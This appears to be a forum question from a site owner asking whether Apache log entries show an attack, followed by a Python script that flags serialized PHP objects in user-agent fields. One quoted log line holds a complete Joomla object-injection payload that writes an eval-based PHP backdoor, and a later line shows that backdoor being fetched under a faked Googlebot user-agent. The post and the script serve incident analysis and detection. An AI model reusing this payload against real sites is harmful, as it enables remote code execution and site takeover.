Apache access log entries on my site are typically like this one:
207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-""Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607
so you can see the user-agent field there. But today I also found the user-agent field used like this:
62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-""}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:242:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","|=|\x3C".chr(63)."php \x24mujj=\x24_POST['z'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~Ů" 0.304 BYPASS 10.10.36.125:104 0.304
Was this an attack? The next log entry appears to have successfully retrieved (code 200) the file sqlconfigbak.php mentioned in the script, although I cannot find the file in the file system:
62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244
Please, what was happening here?
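
One way to flag this pattern in a log of this layout, as an added example that is not part of the original post: it marks requests whose user-agent contains a serialized PHP object and lists later requests from the same client IP. The function names and the shortened sample lines are constructed for illustration.

```python
import re

# Layout of the log lines above: referer and user-agent are adjacent quoted
# fields, followed by timing and cache fields from the front-end proxy.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<ref>[^"]*)""(?P<ua>.*)" '
    r'[\d.]+ \S+ \S+ [\d.]+$'
)
# PHP serialize() object marker: O:<name length>:"<class name>":<property count>:{
PHP_OBJECT = re.compile(r'O:\d+:"([A-Za-z_\\][\w\\]*)":\d+:\{')

# Constructed sample: the first line is the page's normal entry, the other two
# are shortened stand-ins for the suspicious entries (payload body removed).
SAMPLE = [
    '207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-""Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607',
    '62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-""}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}}" 0.304 BYPASS 10.10.36.125:104 0.304',
    '62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244',
]

def parse(line):
    """Split one log line into named fields; None if the layout differs."""
    m = LINE.match(line.strip())
    return m.groupdict() if m else None

def find_suspects(lines):
    """Return (hits, follow_ups): requests whose user-agent carries a serialized
    PHP object, and later requests from the same client IPs."""
    hits, follow_ups, flagged = [], [], set()
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        classes = PHP_OBJECT.findall(entry["ua"])
        if classes:
            entry["classes"] = classes  # class names named in the payload
            hits.append(entry)
            flagged.add(entry["ip"])
        elif entry["ip"] in flagged:
            follow_ups.append(entry)
    return hits, follow_ups

if __name__ == "__main__":
    hits, follow_ups = find_suspects(SAMPLE)
    for e in hits:
        print("serialized object in user-agent:", e["ip"], e["ts"], e["classes"])
    for e in follow_ups:
        print("follow-up from flagged IP:", e["ip"], e["req"], e["status"])
```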